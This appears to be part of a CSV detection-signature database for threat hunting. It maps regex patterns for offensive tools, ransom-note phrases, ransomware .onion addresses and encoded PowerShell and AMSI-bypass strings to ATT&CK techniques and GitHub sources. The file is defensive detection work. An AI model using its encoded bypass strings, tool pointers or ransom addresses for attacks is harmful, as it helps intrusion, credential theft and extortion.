T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - 
AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","0","N/A","N/A","10","10","116","23","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z","63380" "*youhacker55/PayGen*",".{0,1000}youhacker55\/PayGen.{0,1000}","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1059.001 - T1209 - T1105 - T1547 - T1027","TA0003 - TA0005 - TA0002 - TA0011","N/A","N/A","Persistence","https://github.com/youhacker55/PayGen","1","1","N/A","N/A","N/A","1","4","0","2023-02-23T00:05:57Z","2021-06-16T20:20:55Z","63381" "*you'll need the system key of the DC that you pulled the NTDS.dit file*",".{0,1000}you\'ll\sneed\sthe\ssystem\skey\sof\sthe\sDC\sthat\syou\spulled\sthe\sNTDS\.dit\sfile.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","0","#content","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","63382" "*Your data is stolen and encrypted*",".{0,1000}Your\sdata\sis\sstolen\sand\sencrypted.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","63383" "*Your files have been encrypted using 
Prince Ransomware!*",".{0,1000}Your\sfiles\shave\sbeen\sencrypted\susing\sPrince\sRansomware!.{0,1000}","offensive_tool_keyword","Prince-Ransomware","Go ransomware utilising ChaCha20 and ECIES encryption.","T1486 - T1489 - T1027","TA0040 - TA0009 ","N/A","N/A","Ransomware","https://github.com/SecDbg/Prince-Ransomware","1","0","#content","N/A","10","","N/A","","","","63384" "*Your Files Have Been Encrypted!*What Happened to My Files?*",".{0,1000}Your\sFiles\sHave\sBeen\sEncrypted!.{0,1000}What\sHappened\sto\sMy\sFiles\?.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","63385" "*Your files have been infected and stolen*",".{0,1000}Your\sfiles\shave\sbeen\sinfected\sand\sstolen.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","63386" "*YOUR FILES HAVE BEEN SUCCESSFULLY DECRYPTED*",".{0,1000}YOUR\sFILES\sHAVE\sBEEN\sSUCCESSFULLY\sDECRYPTED.{0,1000}","offensive_tool_keyword","DEDSEC-RANSOMWARE","dedsec ransomware","T1486 - T1489 - T1490 - T1495 - T1488 - T1482","TA0040 - TA0043 - TA0042 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/xelroth/DEDSEC-RANSOMWARE","1","0","N/A","N/A","10","1","7","1","2024-05-17T11:12:23Z","2024-05-17T10:34:03Z","63387" "*Your finest PE backdooring companion*",".{0,1000}Your\sfinest\sPE\sbackdooring\scompanion.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team 
oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","63388" "*Your Moms Smart Vibrator*",".{0,1000}Your\sMoms\sSmart\sVibrator.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","#useragent","user-agent","10","10","1156","154","2025-03-11T13:58:24Z","2020-09-06T23:02:37Z","63389" "*Your network has been penetrated.*",".{0,1000}Your\snetwork\shas\sbeen\spenetrated\..{0,1000}","offensive_tool_keyword","Rust-Malware-Samples","open source ransomware Encryfer in rust","T1486 - T1489 - T1485","TA0040 - TA0043 - TA0042","N/A","N/A","Ransomware","https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Malware-Samples","1","0","N/A","N/A","10","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","63390" "*your script has been obfuscated and output to *",".{0,1000}your\sscript\shas\sbeen\sobfuscated\sand\soutput\sto\s.{0,1000}","offensive_tool_keyword","spinningteacup","identify different parts of a vba script and perform substitutions","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","63391" "*your sensitive data, which we Will leak or sell in case of no cooperation*",".{0,1000}your\ssensitive\sdata,\swhich\swe\sWill\sleak\sor\ssell\sin\scase\sof\sno\scooperation.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes 
archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","63392" "*YOUR SERVER HAS BEED HACKED *",".{0,1000}YOUR\sSERVER\sHAS\sBEED\sHACKED\s.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#content","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","63393" "*Your speaktext was sent to the speaker as voice. Mohahaha*",".{0,1000}Your\sspeaktext\swas\ssent\sto\sthe\sspeaker\sas\svoice\.\sMohahaha.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","63394" "*Your version of Luna Token Grabber is outdated!*",".{0,1000}Your\sversion\sof\sLuna\sToken\sGrabber\sis\soutdated!.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","N/A","N/A","10","","N/A","","","","63395" "*your_encrypted_files.txt*",".{0,1000}your_encrypted_files\.txt.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","63396" 
"*YOUR_FILES_ARE_ENCRYPTED.HTML*",".{0,1000}YOUR_FILES_ARE_ENCRYPTED\.HTML.{0,1000}","offensive_tool_keyword","SunCrypt","SunCrypt ransomware","T1486 - T1490","TA0040","N/A","N/A","Ransomware","https://github.com/rivitna/Malware","1","0","#content","N/A","10","4","357","52","2025-04-22T10:00:56Z","2021-07-28T21:00:52Z","63397" "*Yourman.sh Mini Shell*",".{0,1000}Yourman\.sh\sMini\sShell.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","#linux","php title webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","63398" "*yo-yo-yo-jbo/hotkeyz*",".{0,1000}yo\-yo\-yo\-jbo\/hotkeyz.{0,1000}","offensive_tool_keyword","hotkeyz","Hotkey-based keylogger for Windows","T1056.001","TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/yo-yo-yo-jbo/hotkeyz","1","1","N/A","N/A","9","1","21","1","2024-10-17T17:50:19Z","2024-06-03T21:23:16Z","63399" "*YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA==*",".{0,1000}YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA\=\=.{0,1000}","offensive_tool_keyword","powershell","amsi bypass base64 string","T1059.001 - T1562.001 - T1562.009","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","#base64","N/A","8","8","N/A","N/A","N/A","N/A","63400" "*ysoserial -*",".{0,1000}ysoserial\s\-.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","0","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","63401" "*ysoserial-*.zip",".{0,1000}ysoserial\-.{0,1000}\.zip","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - 
TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","1","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","63402" "*ysoserial.exe*",".{0,1000}ysoserial\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","63403" "*ysoserial.exe*",".{0,1000}ysoserial\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice 
Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","N/A","10","10","133","40","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z","63404" "*ysoserial.exe*",".{0,1000}ysoserial\.exe\s.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","1","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","63405" "*ysoserial.net*",".{0,1000}ysoserial\.net.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","1","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","63406" "*ysoserial.sln*",".{0,1000}ysoserial\.sln.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","1","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","63407" "*ytisf/PyExfil*",".{0,1000}ytisf\/PyExfil.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","63408" "*ytmrdnutyd5drtny.azurewebsites.net*",".{0,1000}ytmrdnutyd5drtny\.azurewebsites\.net.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations 
toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","1","N/A","N/A","9","","N/A","","","","63409" "*yunuscadirci/CallStranger*",".{0,1000}yunuscadirci\/CallStranger.{0,1000}","offensive_tool_keyword","POC","Vulnerability checker for Callstranger (CVE-2020-12695). An attacker can use this vulnerability for Bypassing DLP for exfiltrating data. Using millions of Internet-facing UPnP device as source of amplified reflected TCP DDoS / SYN Flood? Scanning internal ports from Internet facing UPnP devices This script only simulates data exfiltration","T1046 - T1595 - T1587","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/yunuscadirci/CallStranger","1","1","N/A","N/A","N/A","5","403","63","2021-08-07T16:48:55Z","2020-06-08T07:37:49Z","63412" "*Yuuup!! Pass Cracked*",".{0,1000}Yuuup!!\sPass\sCracked.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A","63413" "*YwBhAGwAYwA=*",".{0,1000}YwBhAGwAYwA\=.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","1","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","63414" "*Z1P73136r4M(*",".{0,1000}Z1P73136r4M\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential 
Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","63415" "*Z1P7H1N65(*",".{0,1000}Z1P7H1N65\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","63416" "*Z1PF01D3r(*",".{0,1000}Z1PF01D3r\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","63417" "*Z29oYWxleWdvYW5kaGFja2F3YXl0aGVnaWJzb24*",".{0,1000}Z29oYWxleWdvYW5kaGFja2F3YXl0aGVnaWJzb24.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","#base64","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","63418" "*Z2VudGlsa2l3aQ==*",".{0,1000}Z2VudGlsa2l3aQ\=\=.{0,1000}","offensive_tool_keyword","BetterSafetyKatz","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","63419" "*Z2VudGlsa2l3aQ==*",".{0,1000}Z2VudGlsa2l3aQ\=\=.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","63420" "*z3wqggtxft7id3ibr7srivv5gjof5fwg76slewnzwwakjuf3nlhukdid.onion*",".{0,1000}z3wqggtxft7id3ibr7srivv5gjof5fwg76slewnzwwakjuf3nlhukdid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","63421" "*Z4nzu/hackingtool*",".{0,1000}Z4nzu\/hackingtool.{0,1000}","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1059 - T1078 - T1105 - T1110 - T1566","TA0002 - TA0008 - TA0009 - TA0005 - TA0007","N/A","N/A","Exploitation tool","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","N/A","10","52217","5629","2025-03-03T15:17:19Z","2020-04-11T09:21:31Z","63422" "*z6vidveub2ypo3d3x7omsmcxqwxkkmvn5y3paoufyd2tt4bfbkg33kid.onion*",".{0,1000}z6vidveub2ypo3d3x7omsmcxqwxkkmvn5y3paoufyd2tt4bfbkg33kid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes 
archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","63423" "*zabbix_session_exp.py -*",".{0,1000}zabbix_session_exp\.py\s\-.{0,1000}","offensive_tool_keyword","POC","POC exploitation of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0003 - TA0002","N/A","N/A","Exploitation tool","https://github.com/random-robbie/cve-2022-23131-exp/blob/main/zabbix.py","1","0","N/A","N/A","N/A","1","8","7","2022-02-23T16:37:13Z","2022-02-23T16:34:03Z","63426" "*zabbix_session_exp.py https*",".{0,1000}zabbix_session_exp\.py\shttps.{0,1000}","offensive_tool_keyword","POC","POC exploitation of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1505 - T1550 - T1574 - T1210 - T1110","TA0001 - TA0009","N/A","N/A","Exploitation tool","https://github.com/Fa1c0n35/zabbix-cve-2022-23131","1","0","N/A","N/A","N/A","1","1","0","2022-02-27T11:31:02Z","2022-02-27T11:30:53Z","63427" "*zabbix_session_exp.py*",".{0,1000}zabbix_session_exp\.py.{0,1000}","offensive_tool_keyword","POC","POC exploitation of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0001 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Mr-xn/cve-2022-23131","1","1","N/A","N/A","N/A","2","151","47","2024-08-11T18:14:56Z","2022-02-18T11:51:47Z","63428"
"*ZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAnAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAJwApACkAIAAtACAAJAAoAEcAZQB0AC0ARABhAHQAZQApACIAIAB8ACAATwB1AHQALQBGAGkAbABlACAAQwA6AFwAVQBBAEMAQgB5AHAAYQBzAHMAVABlAHMAdAAuAHQAeAB0ACAALQBBAHAAcABlAG4AZAA*",".{0,1000}ZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAnAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAJwApACkAIAAtACAAJAAoAEcAZQB0AC0ARABhAHQAZQApACIAIAB8ACAATwB1AHQALQBGAGkAbABlACAAQwA6AFwAVQBBAEMAQgB5AHAAYQBzAHMAVABlAHMAdAAuAHQAeAB0ACAALQBBAHAAcABlAG4AZAA.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","#base64","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","63429" 
"*ZAQwsxcde321*",".{0,1000}ZAQwsxcde321.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","0","N/A","N/A","10","10","306","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z","63431" "*zarp.py*",".{0,1000}zarp\.py.{0,1000}","offensive_tool_keyword","zarp","A network attack framework.","T1484 - T1498 - T1569","TA0001 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/hatRiot/zarp","1","0","N/A","N/A","N/A","10","1468","327","2023-05-01T20:18:05Z","2012-09-16T18:02:34Z","63432" "*zblurx/certsync*",".{0,1000}zblurx\/certsync.{0,1000}","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145 - T1649","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","1","N/A","N/A","10","7","633","66","2024-03-20T10:58:15Z","2023-01-31T15:37:12Z","63434" "*zblurx/dploot*",".{0,1000}zblurx\/dploot.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","63435" "*zcgonvh/DCOMPotato*",".{0,1000}zcgonvh\/DCOMPotato.{0,1000}","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","1","N/A","N/A","10","4","356","48","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z","63436" 